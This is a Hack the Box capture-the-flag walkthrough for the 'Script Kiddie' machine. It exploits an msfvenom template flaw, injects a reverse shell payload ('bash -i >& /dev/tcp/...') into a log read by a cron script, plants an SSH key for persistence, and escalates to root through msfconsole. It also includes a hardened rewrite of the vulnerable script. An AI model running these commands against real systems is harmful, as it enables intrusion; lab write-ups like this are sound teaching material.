Hack the Box - Script Kiddie

hack the box Jun 5, 2021

Welcome back everyone! Today we are going to do the Hack the Box machine Script Kiddie. This is a Linux machine rated as easy. Let's jump in!

As always, we kick off our scans with nmap - nmap -sC -sV -p- -oA allscan

Here are our results:

Nmap scan report for
Host is up (0.049s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp  open     http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
59012/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There isn't much to go on. We see a webserver on port 5000 and that's about it. Let's take a look.

We see a basic hacking tool interface: we can scan an IP address or create payloads, and we can upload a payload template as well. We test out the page and sure enough it does generate some payloads. Some googling around leads us to an msfvenom template CVE and PoC.

We can find this template in Metasploit. If we search for template in MSF we see the module:

We list out our options. We have pretty much the basics, an LPORT and an LHOST.

We'll add our IP and port and generate the payload.

We can even run the following to have MSF spin up an automatic payload handler if we want. I often do this, but in this case we'll use netcat.

msf6> set DisablePayloadHandler false

Running the exploit shows us the path the file is saved. We'll copy out the payload and upload it to our web interface we found before. We also need to have a listener running.

nc -lvnp 4444

We can then set the localhost field on the website to our listener's address and the platform to android.

Once we hit generate, we should catch a connection back.

Now we want to upgrade this shell. First, we check for Python and Python3.

which python
which python3

We see Python3 installed so we'll upgrade our shell with that.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now with a better shell, we can look around. This account does contain the user.txt flag, awesome! Now we can start enumerating for the root.txt flag.

Next we want to find a better way to stay connected. We can append our ssh key to the authorized_keys file for this user. First we'll want to make a new key with ssh-keygen.


We can copy the id_rsa.pub content into the authorized_keys file. Now we can just ssh into the box.

ssh -i id_rsa kid@

Now that we're in, we don't even have to load LinEnum.sh or any other enumeration tools. We are able to manually access the pwn user's home directory and freely look around to start.

Inside the pwn user account, we see a file called scanlosers.sh with the following code:

#!/bin/bash

# $log is set earlier in the original script and points at the hackers
# log file (the path is not shown in this write-up).

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    # the third field onward of each log line is dropped straight into a shell string
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Can you spot the problem with this script? That's right, the log contents are handed straight to sh -c, so we can inject commands into it. After some trial and error we find a command we can append to the hackers file to get a shell back.

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1' #" >> hackers

We quickly see the shell returned as pwn.
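For contrast, here is a hardened rewrite of that scanning pattern. This is an added example, not the box's scanlosers.sh: it assumes the same log layout (one entry per line, address in the third field onward) and the same recon/<ip>.nmap output naming, validates every candidate as a dotted-quad IPv4 address before it is used, and passes the address to the scanner as a single argument instead of interpolating it into an sh -c string. The scanner command is a parameter so the demo can run where nmap is not installed, and the sample log lines are constructed.

```shell
#!/bin/sh
# Added example, not the box's scanlosers.sh: the same workflow with the
# command-injection hole closed. Assumptions: the log holds one entry per
# line with the address in the third field onward, and scan output goes to
# <outdir>/<ip>.nmap as in the original.

# Accept only a dotted-quad IPv4 address (four decimal octets, each 0-255).
# Anything else, including "10.0.0.5; id", is rejected before it can reach a shell.
is_ipv4() {
    ip=$1
    case "$ip" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    set -- $(printf '%s' "$ip" | tr '.' ' ')
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] || return 1
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Read the log the way the original does, but emit only validated addresses.
# Rejected entries go to stderr so an injection attempt is visible in the logs.
safe_targets() {
    logfile=$1
    cut -d' ' -f3- "$logfile" | sort -u | while read -r ip; do
        if is_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'rejected log entry: %s\n' "$ip" >&2
        fi
    done
}

# Scan each validated target. The address is its own argv element and is never
# part of a string a shell re-parses. The scanner is a parameter (default nmap)
# so the example can be exercised without nmap installed.
scan_targets() {
    logfile=$1
    scanner=${2:-nmap}
    outdir=${3:-recon}
    mkdir -p "$outdir"
    safe_targets "$logfile" | while read -r ip; do
        "$scanner" --top-ports 10 -oN "$outdir/$ip.nmap" "$ip"
    done
}

# Constructed sample log: one legitimate entry, one injection attempt and one
# out-of-range address.
demo_dir=$(mktemp -d)
demo_log="$demo_dir/hackers"
printf '%s\n' \
    '2021-06-05 12:00:01 10.0.0.5' \
    '2021-06-05 12:00:02 10.0.0.5; id' \
    '2021-06-05 12:00:03 999.1.1.1' > "$demo_log"

# Prints only 10.0.0.5; the other two entries are reported on stderr.
safe_targets "$demo_log"
```

The two changes that matter are the allow-list check before the value is used and the direct exec of the scanner with the address as a separate argument; either one alone would have stopped the payload in this write-up, and together they also give the defender a log line when someone tries.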

However, pwn cannot access root.txt. So we need to look around some more. Basic enumeration shows us that we can run msfconsole as root.

Awesome, let's do that. When the console loads, we get a bunch of ioctl errors, but when we check our id, we are running as root.

Now we can simply cat the root.txt flag!

A nice easy box with some required research and trial / error.

If you found this write-up useful, send some respect my way:
